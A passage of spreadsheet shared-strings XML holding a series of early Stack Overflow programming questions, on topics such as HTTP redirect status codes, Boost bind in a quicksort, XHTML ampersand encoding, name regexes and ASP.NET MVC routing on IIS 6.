    <t>HTTP status for functional redirect</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Right now we've got web pages that show UI elements, and web pages that just process form submissions, and then redirect back to the UI pages.  They do this using PHP's header() function:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;header("Location: /other_page.php");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This causes a 302 Found response to be sent; according to the HTTP 1.1 spec, 302 is for cases where "The requested resource resides temporarily under a different URI." &lt;a href="http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html#sec10.3.3" rel="nofollow"&gt;[HTTP 1.1 spec]&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Functionally, this is fine, but it doens't seem like this is the proper status code for what we're doing.  It looks like 303 ("See Other") is the appropriate status here, so I'm wondering if there's any reason not to use it.  We'd have to be more explicit in our use of header(), since we'd have to specify that status line rather than just a Location: field.  Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Crystal Reports 8.5 grouping</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am grouping using a formula fCity which goes like this
If {X.MailingCity} &gt; "" Then
{X.MailingCity}
Else
{X.City}
I have two different fields in my view (Home City and Mailing City)&lt;/p&gt;
&lt;p&gt;Now, these fields contain many rural communities and in my report I want to have these smaller rural communities included with the major city it is located near.  I created another group (Specified Order) and created the major cities and was attempting to include the rural cities into these groups.  IN the end I ended up with many of the communities in "OTHER" category.  It was only picking up rural communities from the X.MailingCity field and not X.City or from my formula fCity.&lt;/p&gt;
&lt;p&gt;Have I just confused you.  If there is someone who understands what I am doing please respond.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Where do I start designing when using O/R mapping? Objects or database tables?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm starting a new database application and I wonder if it would be better to start the design at the objects (with UML) and build the database schema accordingly, or start at the design of the database (with ER) and create the objects accordingly.&lt;/p&gt;
&lt;p&gt;What are the pros and cons of either approach?&lt;/p&gt;
&lt;p&gt;(I dont think it matters but just in case: I'm planning to use Java and Hibernate)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Does Castle-Windsor support ForwardedTypes via XML configuration</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a class that implements multiple interfaces.
I would like to register these interfaces via XML.
All I've found is documentation for the new Fluent Interface. 
Is this option supported via XML?
What would be involved in adding this feature?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best free software products that improve productivity?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are the best free software products that improve productivity?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Any big sites using Client Side XSLT?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Lately, I've been pondering the somewhat non-mainstream architecture of building raw XML on the server side, and then using an XSLT stylesheet on the client to transform the XML into the full UI.  Of course, a fallback mechanism would have to exist if the client was not capable of client side XSLT, in which case we'd just transform it for them on the server side.&lt;/p&gt;
&lt;p&gt;I'm already intimately familiar with XSLT, and this approach seems to be a clean separation of presentation and content, completely forcing the data into XML, and using XSLT for presentation.&lt;/p&gt;
&lt;p&gt;I'm also aware that this does add an extra layer of complexity to the application, which is just another moving part that can fail.&lt;/p&gt;
&lt;p&gt;My question is: are there any big name or big traffic sites using this approach, and if so: what limitations/lessons learned did you take away from it?&lt;/p&gt;
&lt;p&gt;Thanks Internet,
Zach&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Checking if an instance's class implements an interface?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a class instance, is it possible to determine if it implements a particular interface? As far as I know, there isn't a built-in function to do this directly. What options do I have (if any)?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>OpenGL background transparency?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using QT's QGLFramebufferObject for off-screen rendering.&lt;br /&gt;
After rendering to the buffer I read the result using glReadPixels()&lt;br /&gt;
The problem is that sometimes the background color I read is just 0 (transparent black) and sometimes it is 0xFF000000 (opaque black)&lt;br /&gt;
This seem to be related to the time the buffer is initialized. If the buffer is a member of the class inherited from QGLWidget then it is 0. If it is initialized anywhere else it's 0xFF000000.  &lt;/p&gt;
&lt;p&gt;Does anybody have any idea what's going on here? What is the good expected result of this read?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Creating a DLNA server/service in VB.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to create a DLNA server in VB.NET.
Since a lot of multimedia devices start supporting DLNA, i would like to see what is possible. Not only streaming video/audio and pictures but see what else can be done.&lt;/p&gt;
&lt;h2&gt;Anybody any starting points? protocol info, some basic code to get started?&lt;/h2&gt;
&lt;p&gt;DLNA is based on UPnP so i geuss that is the direction i have to start looking. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Parallel quicksort: recursion using Boost Bind?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working on making quicksort parallel, threads being the first attempt.  The non threaded version sorts correctly but the threaded doesn't (no surprise there).  What I found interesting was when I removed the threads but kept the boost::bind calls it still doesn't work.  If boost::bind isn't what I want please offer a suggestion.  Bind seemed to be the easiest (or only) way to make my function work with boost threads.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;void Quicksort( fVec &amp;amp;Array, const int Left, const int Right )
{
    if( Right &amp;lt;= Left )
        return;
    int pivot = Left;
    const int pivotNewIndex = Partition( Array, Left, Right, pivot );
    // These function calls make it work fine
    //Quicksort( Array, Left, pivotNewIndex - 1 );
    //Quicksort( Array, pivotNewIndex + 1, Right );
    // boost::bind calls only swaps one element, doesn't actually sort
    boost::bind( &amp;amp;Quicksort, Array, Left, pivotNewIndex - 1 )();
    boost::bind( &amp;amp;Quicksort, Array, pivotNewIndex + 1, Right )();
    // threaded version that doesn't work, same as above
    //boost::thread threadA( boost::bind( &amp;amp;Quicksort, Array, Left, pivotNewIndex - 1 ) );
    //threadA.join();
    //boost::thread threadB( boost::bind( &amp;amp;Quicksort, Array, pivotNewIndex + 1, Right ) );
    //threadB.join();
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How to publish our Webservices</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have created an web service I need to publish this service. I need to host and authenticated users need to access my services using ASP.net 2.0&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you test a public/private DSA keypair?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there an easy way to verify that a given private key matches a given public key?  I have a few *.pub, and a few *.key files, and I need to check which go with which.&lt;/p&gt;
&lt;p&gt;Again, these are pub/key files, DSA.&lt;/p&gt;
&lt;p&gt;I would really prefer a one-liner of some sort...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>System Calls: UNIX, Linux, BSD and Solaris variations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h3&gt;Are there differences between the amount of syscalls in the major *NIX variants ?&lt;/h3&gt;
&lt;h3&gt;Which syscalls would be supported universally ?&lt;/h3&gt;
</t>
  </si>
  <si>
    <t>Session is lost with login control in Internet Explorer 7</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After logging in using the Login control the browser loses the session.  This only occurs in Internet Explorer 7.  Has anyone else run into this problem?  If so, do you know a work around?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I call Perl from Java?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Perl module that I would like to use from Java. Is there a way to call this code using either ActiveState Perl on Windows or the generic Perl that comes with Linux? I have found references to JPL but it doesnâ€™t appear to be maintained anymore.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Style for web application grid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working on a small bugtracking system which shows a list of bugs. For the overview I want to use a grid - now I only need a style. &lt;/p&gt;
&lt;p&gt;Of course I won't copy the whole style from anyone else, but I just want to know which type of styles you like. Do you have any other great style?&lt;/p&gt;
&lt;p&gt;What do you think about the styles on &lt;a href="http://mattberseth.com/blog/2008/06/4_new_grouping_grid_skins_vist.html" rel="nofollow"&gt;this site&lt;/a&gt;.
Do you like the &lt;a href="http://www.componentart.com/webui/demos/demos_control-specific/grid/design/default/WebForm1.aspx" rel="nofollow"&gt;Component art grid styles&lt;/a&gt;?
What about the &lt;a href="http://demos.telerik.com/aspnet-ajax/grid/examples/overview/defaultcs.aspx" rel="nofollow"&gt;styles from telerik&lt;/a&gt;?&lt;/p&gt;
&lt;p&gt;Thanks for your help&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Wheel Reinvention Avoidance for Web Rating Feature</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a need to implement a rating feature and would like to do it the mouse-over stars way similar to netflix.&lt;/p&gt;
&lt;p&gt;What is my best approach? Here are some that come to mind.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;code it up by hand in HTML and
javascript&lt;/li&gt;
&lt;li&gt;use flash or a java applet&lt;/li&gt;
&lt;li&gt;use &lt;a href="http://www.nickstakenburg.com/projects/starbox/" rel="nofollow"&gt;Starbox&lt;/a&gt; (if you have used Starbox, then feel free to comment on it)&lt;/li&gt;
&lt;li&gt;use another java script library (please specify)&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>Accessing the value of a session variable of a specific session</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to integrate a public message board service into an existing web site. &lt;/p&gt;
&lt;p&gt;The handshaking between the apps goes like this:&lt;/p&gt;
&lt;p&gt;1) File on my web site loads a flash file. The Flash reads a local variable that is the Session ID, or some other GUID unique to the user session.&lt;/p&gt;
&lt;p&gt;2) Flash app connects with the remote service, passing the SessionID to the service.&lt;/p&gt;
&lt;p&gt;3) The service issues a GET request back to the originating web site, asking for additional information about the user.&lt;/p&gt;
&lt;p&gt;4) The originating web site (my site) validates that the session ID is for a valid session, and if yes, passes back the other requested information. &lt;/p&gt;
&lt;p&gt;I'd like to be able to use the intrinsic ASP SessionID but I'm not sure how in Classic ASP to retrieve session variables for a &lt;strong&gt;specific&lt;/strong&gt; ASP Session, ie, I want the value of Session("FirstName") where SessionID=1234 and not Session("FirstName") for any other session ID. I haven't been able to find any syntax that would allow me to do this.&lt;/p&gt;
&lt;p&gt;The alternative is to create a new GUID for every session, but that's adding a lot of overhead.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: How do I know which jar file to use given a class name?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given a class, &lt;a href="http://help.eclipse.org/stable/index.jsp?topic=/org.eclipse.platform.doc.isv/reference/api/org/eclipse/ui/views/navigator/ResourceNavigator.html"&gt;org.eclipse.ui.views.navigator.ResourceNavigator&lt;/a&gt; for example, how do I find out which jar file to use? I know it's in org.eclipse.ui.ide, but how would I find that out?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit&lt;/strong&gt;: Thank you to all of you who answered. Like many things, there seems to be several ways to skin this cat. I wish javadoc contained this info. So far here are the different methods:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Without Internet, Eclipse or NetBeans:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for f in `find . -name '*.jar'`;  do echo $f &amp;amp;&amp;amp; jar tvf $f | grep -i $1; done
&lt;/code&gt;&lt;/pre&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If you want to find out locally using Eclipse:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.alphaworks.ibm.com/tech/jarclassfinder"&gt;JAR Class Finder Plug-in&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="http://classlocator.sourceforge.net/"&gt;Class Locator Plug-in&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;If you want to find out from Internet or you do not have the jar yet:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="http://www.jarfinder.com/"&gt;jarFinder&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ol&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Shutterfly Order API . </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I found this site&lt;/p&gt;
&lt;p&gt;&lt;a href="http://www.shutterfly.com/documentation/api_OrderImage.sfly" rel="nofollow"&gt;http://www.shutterfly.com/documentation/api_OrderImage.sfly&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;but there are no examples of actually walking through the whole process.  Does anyone have any good documentation on using this API to take a local photo and allow someone to order a print via shutterfly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>XHTML and &amp; (Ampersand) encoding</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My website is XHTML Transitional compliant &lt;strong&gt;except for one thing&lt;/strong&gt;: the &amp;amp; (ampersand) in the URL are written as it is, instead of &lt;code&gt;&amp;amp;amp;&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;That is, all the urls in my pages are usually like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a href="http://www.foo.com/page.aspx?x=1&amp;amp;y=2"&amp;gt;Foo&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But &lt;a href="http://validator.w3.org/"&gt;XHTML validator&lt;/a&gt; generates this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;cannot generate system identifier for general entity "y"&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;... and it wants the url to be written like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;a href="http://www.foo.com/page.aspx?x=1&amp;amp;amp;y=2"&amp;gt;Foo&amp;lt;/a&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that IE and Firefox don't handle the URL correctly and ignore the y parameter. &lt;strong&gt;How can I make this link work and validate correctly?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;It seems to me that it is impossible to write XHTML pages if the browsers don't work with strict encoded XHTML URLs.&lt;/p&gt;
&lt;p&gt;Do you want to see in action? See the difference between these two links (copy and paste them as they are): &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://stackoverflow.com/search?q=ff&amp;amp;sort=newest
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://stackoverflow.com/search?q=ff&amp;amp;amp;sort=newest
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Regex for names</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Just starting to explore the 'wonders' of regex.  Being someone who learns from trial and error, I'm really struggling because my trials are throwing up a disproportionate amount of errors...  My experiments are in PHP using ereg().&lt;/p&gt;
&lt;p&gt;Anyway.  I work with first and last names separately but for now using the same regex.  So far I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;^[A-Z][a-zA-Z]+$  
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any length string that starts with a capital and has only letters (capital or not) for the rest.  But where I fall apart is dealing with the special situations that can pretty much occur anywhere.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Hyphenated Names (Worthington-Smythe)  &lt;/li&gt;
&lt;li&gt;Names with Apostophies (D'Angelo)  &lt;/li&gt;
&lt;li&gt;Names with Spaces (Van der Humpton) - capitals in the middle which may or may not be required is way beyond my interest at this stage.&lt;/li&gt;
&lt;li&gt;Joint Names (Ben &amp;amp; Jerry)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Maybe there's some other way a name can be that I'm no thinking of, but I suspect if I can get my head around this, I can add to it.  I'm pretty sure there will be instances where more than one of these situations comes up in one name.&lt;/p&gt;
&lt;p&gt;So, I think the bottom line is to have my regex also accept a space, hyphens, ampersands and apostrophes - but not at the start or end of the name to be technically correct.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Excel / Quickbooks data to c#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know how to use the OleDbConnection class to open an excel file and select from it, but is there a simple method to read the data from an excel file that has been read into a Stream? And is there also a similar method for QuickBooks?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I increase the stack size with runhaskell?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing some disposable Haskell scripts to solve some of the &lt;a href="http://projecteuler.net"&gt;Project Euler&lt;/a&gt; problems. I don't really want to have to compile them because of the number of changes I'm constantly having to make, but in a few cases I've found that I've run out of stack space.&lt;/p&gt;
&lt;p&gt;The documentation for &lt;code&gt;runhaskell&lt;/code&gt; says that the following syntax should increase the stack space:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;runhaskell +RTS -K5M -RTS Script.hs
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This never, ever works (in any permutation I've tried). The stack size always remains 8,388,608. This is maddening, and I haven't found much help on Google.&lt;/p&gt;
&lt;p&gt;Any suggestions? What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best practices for project organization with ASP.NET MVC</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently downloaded Rob Conery's excellent &lt;a href="http://blog.wekeroad.com/mvc-storefront/"&gt;ASP.NET Storefront reference application&lt;/a&gt; and am finding it incredibly instructive.  One question that comes to mind is where one should place the Model classes (and the Data classes upon which they depend).  The MVC project template creates a Model folder.  But it seems to me that I would be better served breaking the model out into a separate project assembly so that it can be re-used by other potential applications (e.g. management tools related to the website's application domain)?&lt;/p&gt;
&lt;p&gt;I'm curious to get people's opinions.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Top-level .mak file for Visual Studio?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've inherited a body of Visual C++ source that consists of about a dozen sub-projects.  One of these is an empty "MakeAll" project that depends on all the others, so I can build the entire project by setting the MakeAll project active and selecting "Build All."&lt;/p&gt;
&lt;p&gt;I'd like to automate this process, and coming from a linux environment, my instinct was to generate a Makefile and build from the command line.  The IDE will generate &lt;code&gt;.mak&lt;/code&gt; files for each of the sub-projects, but not for the top-level MakeAll.  (I'm assuming this is because it contains nothing but dependencies.)&lt;/p&gt;
&lt;p&gt;The linux answer would be a Makefile that simply descends into each of the sub-projects and executes &lt;code&gt;make&lt;/code&gt; in each one.  But a quick look at the &lt;code&gt;.mak&lt;/code&gt; files showed that each wants to be told which of several configurations to use -- and apparently some use Debug, some use Release, and some use configurations concocted by a previous developer.&lt;/p&gt;
&lt;p&gt;What's the accepted way to build a set of projects like this from the command line?&lt;/p&gt;
&lt;p&gt;Thank you!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>java ee | ejb3 | runtime dispatch</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to call an ejb3 at runtime. The name of the ejb and the method name will only be available at runtime, so I cannot include any remote interfaces at compile time.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;String bean = 'some/Bean';
String meth = 'doStuff';
//lookup the bean
Object remoteInterface = (Object) new InitialContext().lookup(bean);
//search the method ..
// foreach (methods)
// if method == meth, method.invoke(bean);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;the beans should be distributed accross multiple application servers, and all beans are to be called remotely.&lt;/p&gt;
&lt;p&gt;Any hints? specifically i do &lt;strong&gt;not&lt;/strong&gt; want:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;dependency injection&lt;/li&gt;
&lt;li&gt;inclusion of appliation specific ejb interfaces in the dispatcher (above)&lt;/li&gt;
&lt;li&gt;webservices, thats like throwing out processing power for nothing, all the xml crap&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is it possible to load an ejb3 remote interface over the network (if yes, how?), so I could cache the interface in some hashmap or something.&lt;/p&gt;
&lt;p&gt;I have a solution with a remote dispatcher bean, which I can include in the above main dispatcher, which does essentially the same, but just relays the call to a local ejb (which I can lookup how? naming lookup fails). Given the remote dispatcher bean, I can use dependency injection.&lt;/p&gt;
&lt;p&gt;thanks for any help&lt;/p&gt;
&lt;p&gt;(netbeans and glassfish btw)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a guide to path referencing in PHP?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know how to include files that are in folders further down the heirachy but I have trouble finding my way back up.
I decided to go with the set_include_path to default all further includes relative to a path 2 levels up but don't have the slightest clue how to write it out.&lt;/p&gt;
&lt;p&gt;Is there a guide somewhere that details path referencing for PHP?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>With wicket where does hibernate.cfg.xml file go?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to Wicket and Hibernate and can't get past the "org.hibernate.HibernateException: /hibernate.cfg.xml not found" error. I've put that file in every location imagineable but I'm still stuck. Where exactly does that file go and/or am I missing a wicket file config setting somewhere?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Excel: 'Unable to set the Calculation property of the Application class'</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to automate some stuff in MS Excel. When I try to set the Calculation property I get the following error message: 'Unable to set the Calculation property of the Application class'&lt;/p&gt;
&lt;p&gt;I believe this property should be settable.&lt;/p&gt;
&lt;p&gt;Any advice appreciated!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Without creating a list, how can I query the integers between two values in Prolog?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example, if I make a query like 'between(1,4,X)?' I would expect something like X=2,X=3. Is this possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET v1.1 Could not load type TBRWEB.frmLogin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web app that I wanted copy to a new project.&lt;/p&gt;
&lt;p&gt;I created the new app with VS2003 and copied across the web forms, config, global asa, etc. and made sure IIS says it is a web app.&lt;/p&gt;
&lt;p&gt;However, I still get this error when I run the app using IE from VS IDE:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ASP.NET v1.1 Could not load type TBRWEB.frmLogin
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I also made sure the assembly name and root namespace are the same as original.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I get Html.CheckBox() as boolean during POST in custom IModelBinder?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using &lt;code&gt;Html.CheckBox()&lt;/code&gt;.  The resulting HTML is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;input id="IsMultiGraph" name="IsMultiGraph" value="true" type="checkbox"&amp;gt;
&amp;lt;input name="IsMultiGraph" value="false" type="hidden"&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;On the server I have an Action which is accepting the form post information and using a custom IModelBinder to bind the form results to one of my models.  Here is a snippet of the code I am running in the IModelBinder:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bool isMultiGraph;
if (!bool.TryParse(bindingContext.HttpContext.Request["IsMultiGraph"], out isMultiGraph))
    bindingContext.ModelState.AddModelError("IsMultiGraph", "Invalid boolean for \"IsMultiGraph\""); //this should not ever happen unless someone is programatically posting
result.IsMultiGraph = isMultiGraph;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that since &lt;code&gt;Html.CheckBox()&lt;/code&gt; is rendering a checkbox as well as a hidden input field if I change the state of the textbox the postback value is doubled (ie. "true,false").&lt;/p&gt;
&lt;p&gt;I understand why this is done and I'm looking for the best way to parse the current value of the CheckBox during a postback (checked = true, unchecked = false).  Is there another helper method in MVC for this or should I just write my own?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Castle MonoRail &amp; ELMAH</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is anyone using Castle MonoRail and ELMAH with success?&lt;/p&gt;
&lt;p&gt;We are using a number of Resuces to present users with friendly error messages, but if we do this the exceptions never get as far as ELMAH as the MonoRail rescue intercepts them.&lt;/p&gt;
&lt;p&gt;Ideally we want the user to see the rescue, but for the exception to be logged in ELMAH.&lt;/p&gt;
&lt;p&gt;Any ideas/pointers?&lt;/p&gt;
&lt;p&gt;Cheers,&lt;/p&gt;
&lt;p&gt;Jay.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I get rid of TagExtraInfo JSTL warning in Eclipse?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm working with JSTL in Eclipse, using the WTP.  I have jstl and standard.jar in my WEB-INF/lib directory, and everything works.  Eclipse is giving me this warning in my JSP:&lt;/p&gt;
&lt;p&gt;The TagExtraInfo class for c:forEach (org.apache.taglibs.standard.tei.ForEachTEI) was not found on the build path.&lt;/p&gt;
&lt;p&gt;I have JSTL included:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c"%&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The warning is on a line that uses a c:forEach.  How can I get rid of it?
My project is targeting Tomcat v6.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC on IIS 6 - wildcard mapping - the incoming request does not match any route</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have been trying to set up my Beta 1 MVC app on IIS 6 and cannot get it to run correctly. I have added a Wildcard mapping to the .net isapi DLL as suggested in other blog posts but get the following error when I access the root of the website:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;The incoming request does not match any route.
..
[HttpException (0x80004005): The incoming request does not match any route.]
   System.Web.Routing.UrlRoutingHandler.ProcessRequest(HttpContextBase httpContext) +147
   System.Web.Routing.UrlRoutingHandler.ProcessRequest(HttpContext httpContext) +36
   System.Web.Routing.UrlRoutingHandler.System.Web.IHttpHandler.ProcessRequest(HttpContext context) +4
   HCD.Intranet.Web.Default.Page_Load(Object sender, EventArgs e) +81
   System.Web.Util.CalliHelper.EventArgFunctionCaller(IntPtr fp, Object o, Object t, EventArgs e) +15
   System.Web.Util.CalliEventHandlerDelegateProxy.Callback(Object sender, EventArgs e) +33
   System.Web.UI.Control.OnLoad(EventArgs e) +99
   System.Web.UI.Control.LoadRecursive() +47
   System.Web.UI.Page.ProcessRequestMain(Boolean includeStagesBeforeAsyncPoint, Boolean includeStagesAfterAsyncPoint) +1436
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using the Default.aspx page supplied in the MVC template application that rewrites access to the root of the website properly.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public partial class Default : Page
{
    public void Page_Load(object sender, System.EventArgs e)
    {
    	HttpContext.Current.RewritePath(Request.ApplicationPath);
    	IHttpHandler httpHandler = new MvcHttpHandler();
    	httpHandler.ProcessRequest(HttpContext.Current);
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I try and access a route within the application, such as /Project, I get the standard IIS 404 error page, not the .net error page.&lt;/p&gt;
&lt;p&gt;I tried adding the following line to my Web.config httpHandlers section:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;add verb="*" path="*" validate="false" type="System.Web.Mvc.MvcHttpHandler, System.Web.Mvc, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"/&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This gave me a different error - the .net 404 error page.&lt;/p&gt;
&lt;p&gt;I added the following to my Global.asax, which did nothing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void Application_BeginRequest(object sender, EventArgs e)
{
    if (Context.Request.FilePath.Equals("/"))
    	Context.RewritePath("Default.aspx");
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I am using the following route configuration (uses the restful routing supplied by the MvcContrib project):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;routes.IgnoreRoute("{resource}.axd/{*pathInfo}");
SimplyRestfulRouteHandler.BuildRoutes(routes);
routes.MapRoute(
"Default", 
"{controller}/{action}/{id}",
new { controller = "Home", action = "Index", id = "" }
);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any suggestions would be grealy received as I've exhausted all options for the time I have right now.&lt;/p&gt;
&lt;p&gt;Many thanks.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>import mechanize module to python script</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I tried to import mechanize module to my python script like this,&lt;/p&gt;
&lt;p&gt;from mechanize import Browser&lt;/p&gt;
&lt;p&gt;But, Google appengine throws HTTP 500 when accessing my script.&lt;/p&gt;
&lt;p&gt;To make things more clear, Let me give you the snapshot of my package structure,&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;root
 ....mechanize(where all the mechanize related files there)
 ....main.py
 ....app.yaml
 ....image
 ....script
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Can anyone help me out to resolve this issue?&lt;/p&gt;
&lt;p&gt;Thanks,
Ponmalar&lt;/p&gt;
</t>
  </si>
  <si>
    <t>mvc framework for winforms .net</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Please suggest a good MVC framework for Winforms.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>std::wcout to console window in XCode</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In an XCode project, if I use &lt;code&gt;std::cout&lt;/code&gt; to write to the console the output is fine.&lt;/p&gt;
&lt;p&gt;However, if I use &lt;code&gt;std::wcout&lt;/code&gt; I get no output.&lt;/p&gt;
